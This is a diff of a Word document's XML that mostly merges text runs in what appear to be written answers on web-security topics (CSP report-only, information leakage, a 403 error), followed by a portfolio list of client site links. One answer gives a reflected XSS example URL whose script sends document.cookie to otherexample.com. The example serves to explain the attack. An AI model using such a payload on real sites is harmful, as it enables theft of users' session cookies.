-          <w:color w:val="4F81BD" w:themeColor="accent1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-          <w:i/>
-          <w:color w:val="4F81BD" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-          <w:i/>
-          <w:color w:val="4F81BD" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>while</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-          <w:i/>
-          <w:color w:val="4F81BD" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ($q) {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:ind w:left="1440"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-          <w:i/>
-          <w:color w:val="4F81BD" w:themeColor="accent1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-          <w:i/>
-          <w:color w:val="4F81BD" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    $</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-          <w:i/>
-          <w:color w:val="4F81BD" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>r</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-          <w:i/>
-          <w:color w:val="4F81BD" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = $q % $b;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:ind w:left="1440"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-          <w:i/>
-          <w:color w:val="4F81BD" w:themeColor="accent1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-          <w:i/>
-          <w:color w:val="4F81BD" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    $</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-          <w:i/>
-          <w:color w:val="4F81BD" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>q</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-          <w:i/>
-          <w:color w:val="4F81BD" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> =floor($q/$b);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:ind w:left="1440"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-          <w:i/>
-          <w:color w:val="4F81BD" w:themeColor="accent1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-          <w:i/>
-          <w:color w:val="4F81BD" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    $</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-          <w:i/>
-          <w:color w:val="4F81BD" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>res</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-          <w:i/>
-          <w:color w:val="4F81BD" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = $base[$r].$res;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-          <w:i/>
-          <w:color w:val="4F81BD" w:themeColor="accent1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-          <w:i/>
-          <w:color w:val="4F81BD" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  }</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-          <w:i/>
-          <w:color w:val="4F81BD" w:themeColor="accent1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-          <w:i/>
-          <w:color w:val="4F81BD" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-          <w:i/>
-          <w:color w:val="4F81BD" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>echo</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-          <w:i/>
-          <w:color w:val="4F81BD" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $res;</w:t>
+        <w:t xml:space="preserve">  echo $res;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1300,21 +748,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
         </w:rPr>
-        <w:t>http://www.example.com/search</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t>?q</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t>=&lt;script&gt;object.src=”http://otherexample.com/code?data=”+document.cookie&lt;/script&gt;</w:t>
+        <w:t>http://www.example.com/search?q=&lt;script&gt;object.src=”http://otherexample.com/code?data=”+document.cookie&lt;/script&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1342,130 +776,105 @@
           <w:b/>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>4</w:t>
-      </w:r>
-      <w:r>
+        <w:t>4. Answer:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve">I am getting </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+        <w:t>forbidden</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> error. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+        <w:t>i.e.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+        <w:t>don’t</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> have permission to access the required </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+        <w:t>URL</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> on the server.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
           <w:b/>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>. Answer:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t xml:space="preserve">I am getting </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t>forbidden</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> error. </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t>i</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t>.e.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t>don’t</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> have permission to access the required </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t>URL</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> on the server.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
           <w:b/>
         </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-          <w:b/>
-        </w:rPr>
-        <w:t>i</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-          <w:b/>
-        </w:rPr>
-        <w:t>.e.</w:t>
+        <w:t>i.e.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1590,15 +999,7 @@
           <w:b/>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>5</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-          <w:b/>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>. Answer:</w:t>
+        <w:t>5. Answer:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1670,19 +1071,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
         </w:rPr>
-        <w:t xml:space="preserve">For example, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t>server operators</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> might wish to develop their security policy iteratively. The operators can deploy a report-only policy based on their best estimate of how their site behaves. If their site violates this policy, instead of breaking the site, the user agent will send violation reports to a URI specified in the policy. Once a site has confidence that the policy is appropriate, they start enforcing the policy using the Content-Security-Policy header field.</w:t>
+        <w:t>For example, server operators might wish to develop their security policy iteratively. The operators can deploy a report-only policy based on their best estimate of how their site behaves. If their site violates this policy, instead of breaking the site, the user agent will send violation reports to a URI specified in the policy. Once a site has confidence that the policy is appropriate, they start enforcing the policy using the Content-Security-Policy header field.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1954,7 +1343,6 @@
         </w:rPr>
         <w:t xml:space="preserve">The potential threat from </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
@@ -1965,14 +1353,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
         </w:rPr>
-        <w:t xml:space="preserve"> is</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> flaw is that attackers can use this weakness to steal sensitive data, or conduct more serious attacks. Applications can unintentionally leak information about their configuration, internal workings, or violate privacy through a variety of application problems.</w:t>
+        <w:t xml:space="preserve"> is flaw is that attackers can use this weakness to steal sensitive data, or conduct more serious attacks. Applications can unintentionally leak information about their configuration, internal workings, or violate privacy through a variety of application problems.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2045,15 +1426,7 @@
           <w:b/>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>6</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
-          <w:b/>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>. Answer:</w:t>
+        <w:t>6. Answer:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2212,16 +1585,7 @@
           <w:bCs/>
           <w:color w:val="351C75"/>
         </w:rPr>
-        <w:t xml:space="preserve">MY </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="351C75"/>
-        </w:rPr>
-        <w:t>PORTFOLIO</w:t>
+        <w:t>MY PORTFOLIO</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2251,12 +1615,6 @@
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
           <w:color w:val="351C75"/>
         </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="351C75"/>
-        </w:rPr>
         <w:fldChar w:fldCharType="separate"/>
       </w:r>
       <w:r>
@@ -2299,15 +1657,8 @@
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
           <w:color w:val="351C75"/>
         </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="351C75"/>
-        </w:rPr>
         <w:fldChar w:fldCharType="separate"/>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Hyperlink"/>
@@ -2315,7 +1666,6 @@
         </w:rPr>
         <w:t>GoBuyLah</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
@@ -2349,15 +1699,8 @@
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
           <w:color w:val="351C75"/>
         </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="351C75"/>
-        </w:rPr>
         <w:fldChar w:fldCharType="separate"/>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Hyperlink"/>
@@ -2365,7 +1708,6 @@
         </w:rPr>
         <w:t>HoneyBay</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
@@ -2399,12 +1741,6 @@
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
           <w:color w:val="351C75"/>
         </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="351C75"/>
-        </w:rPr>
         <w:fldChar w:fldCharType="separate"/>
       </w:r>
       <w:r>
@@ -2447,12 +1783,6 @@
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
           <w:color w:val="351C75"/>
         </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="351C75"/>
-        </w:rPr>
         <w:fldChar w:fldCharType="separate"/>
       </w:r>
       <w:r>
@@ -2495,12 +1825,6 @@
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
           <w:color w:val="351C75"/>
         </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="351C75"/>
-        </w:rPr>
         <w:fldChar w:fldCharType="separate"/>
       </w:r>
       <w:r>
@@ -2543,12 +1867,6 @@
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
           <w:color w:val="351C75"/>
         </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="351C75"/>
-        </w:rPr>
         <w:fldChar w:fldCharType="separate"/>
       </w:r>
       <w:r>
@@ -2591,12 +1909,6 @@
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
           <w:color w:val="351C75"/>
         </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="351C75"/>
-        </w:rPr>
         <w:fldChar w:fldCharType="separate"/>
       </w:r>
       <w:r>
@@ -2604,17 +1916,50 @@
           <w:rStyle w:val="Hyperlink"/>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t xml:space="preserve">Dot Com </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>Dot Com Infoway</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="351C75"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="351C75"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="351C75"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="351C75"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> HYPERLINK "http://www.hpcsystems.com" \t "_blank" </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="351C75"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Hyperlink"/>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t>Infoway</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>HPC Systems</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
@@ -2641,13 +1986,7 @@
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
           <w:color w:val="351C75"/>
         </w:rPr>
-        <w:instrText xml:space="preserve"> HYPERLINK "http://www.hpcsystems.com" \t "_blank" </w:instrText>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="351C75"/>
-        </w:rPr>
+        <w:instrText xml:space="preserve"> HYPERLINK "http://www.trademymotor.com/" \t "_blank" </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2661,7 +2000,7 @@
           <w:rStyle w:val="Hyperlink"/>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t>HPC Systems</w:t>
+        <w:t>Trade My Motor</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2689,13 +2028,7 @@
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
           <w:color w:val="351C75"/>
         </w:rPr>
-        <w:instrText xml:space="preserve"> HYPERLINK "http://www.trademymotor.com/" \t "_blank" </w:instrText>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="351C75"/>
-        </w:rPr>
+        <w:instrText xml:space="preserve"> HYPERLINK "http://www.rydalcomms.co.uk/" \t "_blank" </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2709,7 +2042,7 @@
           <w:rStyle w:val="Hyperlink"/>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t>Trade My Motor</w:t>
+        <w:t>Rydal Communications</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2737,13 +2070,7 @@
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
           <w:color w:val="351C75"/>
         </w:rPr>
-        <w:instrText xml:space="preserve"> HYPERLINK "http://www.rydalcomms.co.uk/" \t "_blank" </w:instrText>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="351C75"/>
-        </w:rPr>
+        <w:instrText xml:space="preserve"> HYPERLINK "http://www.universal-publishers.com/" \t "_blank" </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2757,7 +2084,7 @@
           <w:rStyle w:val="Hyperlink"/>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t>Rydal Communications</w:t>
+        <w:t>Universal Publishers</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2785,13 +2112,7 @@
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
           <w:color w:val="351C75"/>
         </w:rPr>
-        <w:instrText xml:space="preserve"> HYPERLINK "http://www.universal-publishers.com/" \t "_blank" </w:instrText>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="351C75"/>
-        </w:rPr>
+        <w:instrText xml:space="preserve"> HYPERLINK "http://www.brownwalker.com/" \t "_blank" </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2805,7 +2126,7 @@
           <w:rStyle w:val="Hyperlink"/>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t>Universal Publishers</w:t>
+        <w:t>Brown Walker Press</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2833,13 +2154,7 @@
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
           <w:color w:val="351C75"/>
         </w:rPr>
-        <w:instrText xml:space="preserve"> HYPERLINK "http://www.brownwalker.com/" \t "_blank" </w:instrText>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="351C75"/>
-        </w:rPr>
+        <w:instrText xml:space="preserve"> HYPERLINK "http://www.dissertation.com/index.php" \t "_blank" </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2853,7 +2168,7 @@
           <w:rStyle w:val="Hyperlink"/>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t>Brown Walker Press</w:t>
+        <w:t>Dissertation</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2881,61 +2196,7 @@
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
           <w:color w:val="351C75"/>
         </w:rPr>
-        <w:instrText xml:space="preserve"> HYPERLINK "http://www.dissertation.com/index.php" \t "_blank" </w:instrText>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="351C75"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="351C75"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
